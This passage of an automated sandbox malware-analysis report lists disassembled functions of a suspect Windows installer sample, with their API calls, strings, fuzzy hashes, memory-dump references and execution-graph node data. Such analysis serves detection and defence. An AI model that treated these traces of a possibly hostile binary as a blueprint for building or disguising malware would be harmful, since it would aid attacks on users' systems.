                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                                                                                                                                                                            Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                                                                                                                                                                            • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                                                                            • String ID: Version
                                                                                                                                                                                                                                                                                                                            • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                                                                                                                                                                            Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                                                                            • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                                                                                                                                                                            Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                                            Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                                            Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                                                                                                                                                                            Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                                                                                                                                                                            Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                                            • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                                                                                                                                                                            Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:46
                                                                                                                                                                                                                                                                                                                            execution_graph 97396 1ddd3d 97397 2219c2 97396->97397 97398 1ddd63 97396->97398 97400 221a82 97397->97400 97404 221a26 97397->97404 97407 221a46 97397->97407 97401 1f014b 8 API calls 97398->97401 97419 1ddead 97398->97419 97456 243fe1 81 API calls __wsopen_s 97400->97456 97406 1ddd8d 97401->97406 97402 1f017b 8 API calls 97412 1ddee4 __fread_nolock 97402->97412 97454 1ee6e8 207 API calls 97404->97454 97408 1f014b 8 API calls 97406->97408 97406->97412 97418 221a7d 97407->97418 97455 243fe1 81 API calls __wsopen_s 97407->97455 97409 1ddddb 97408->97409 97409->97404 97411 1dde16 97409->97411 97410 1f017b 8 API calls 97410->97412 97413 1e0340 207 API calls 97411->97413 97412->97407 97412->97410 97414 1dde29 97413->97414 97414->97412 97415 221aa5 97414->97415 97416 1dde77 97414->97416 97414->97418 97420 1dd526 97414->97420 97457 243fe1 81 API calls __wsopen_s 97415->97457 97416->97419 97416->97420 97419->97402 97421 1f014b 8 API calls 97420->97421 97422 1dd589 97421->97422 97438 1dc32d 97422->97438 97425 1f014b 8 API calls 97431 1dd66e messages 97425->97431 97426 1dc3ab 8 API calls 97436 1dd9ac messages 97426->97436 97427 1dbed9 8 API calls 97427->97431 97430 221f79 97459 2356ae 8 API calls messages 97430->97459 97431->97427 97431->97430 97433 221f94 97431->97433 97435 1dd911 messages 97431->97435 97445 1dc3ab 97431->97445 97458 1db4c8 8 API calls 97431->97458 97435->97426 97435->97436 97437 1dd9c3 97436->97437 97453 1ee30a 8 API calls messages 97436->97453 97441 1dc33d 97438->97441 97439 1dc345 97439->97425 97440 1f014b 8 API calls 97440->97441 97441->97439 97441->97440 97442 1dbf73 8 API calls 97441->97442 97443 1dbed9 8 API calls 97441->97443 97444 1dc32d 8 API calls 97441->97444 97442->97441 97443->97441 97444->97441 97446 1dc3b9 97445->97446 97452 1dc3e1 messages 97445->97452 97447 1dc3c7 97446->97447 97449 1dc3ab 8 API calls 97446->97449 97448 1dc3cd 97447->97448 97450 1dc3ab 8 API calls 97447->97450 97448->97452 97460 1dc7e0 8 API calls messages 97448->97460 97449->97447 97450->97448 97452->97431 97453->97436 97454->97407 97455->97418 97456->97418 97457->97418 97458->97431 97459->97433 97460->97452 95966 1df4dc 95969 1dcab0 95966->95969 95970 1dcacb 95969->95970 95971 22150c 95970->95971 95973 2214be 95970->95973 95999 1dcaf0 95970->95999 96041 2562ff 207 API calls 2 library calls 95971->96041 95975 2214c8 95973->95975 95978 2214d5 95973->95978 95973->95999 96039 256790 207 API calls 95975->96039 95995 1dcdc0 95978->95995 96040 256c2d 207 API calls 2 library calls 95978->96040 95980 1ee807 39 API calls 95980->95999 95983 1dcf80 39 API calls 95983->95999 95984 22179f 95984->95984 95987 1dcdee 95988 2216e8 96048 256669 81 API calls 95988->96048 95995->95987 96049 243fe1 81 API calls __wsopen_s 95995->96049 95999->95980 95999->95983 95999->95987 95999->95988 95999->95995 96000 1e0340 95999->96000 96023 1dbe2d 95999->96023 96027 1ee7c1 39 API calls 95999->96027 96028 1eaa99 207 API calls 95999->96028 96029 1f05b2 5 API calls __Init_thread_wait 95999->96029 96030 1ebc58 95999->96030 96035 1f0413 29 API calls __onexit 95999->96035 96036 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95999->96036 96037 1ef4df 81 API calls 95999->96037 96038 1ef346 207 API calls 95999->96038 96042 1db4c8 8 API calls 95999->96042 96043 22ffaf 8 API calls 95999->96043 96044 1dbed9 95999->96044 96018 1e0376 messages 96000->96018 96001 1f0413 29 API calls pre_c_initialization 96001->96018 96002 22632b 96125 243fe1 81 API calls __wsopen_s 96002->96125 96004 1e1695 96010 1dbed9 8 API calls 96004->96010 96017 1e049d messages 96004->96017 96005 1f014b 8 API calls 96005->96018 96007 1dbed9 8 API calls 96007->96018 96008 225cdb 96014 1dbed9 8 API calls 96008->96014 96008->96017 96009 22625a 96124 243fe1 81 API calls __wsopen_s 96009->96124 96010->96017 96014->96017 96015 1f05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96015->96018 96016 1dbf73 8 API calls 96016->96018 96017->95999 96018->96001 96018->96002 96018->96004 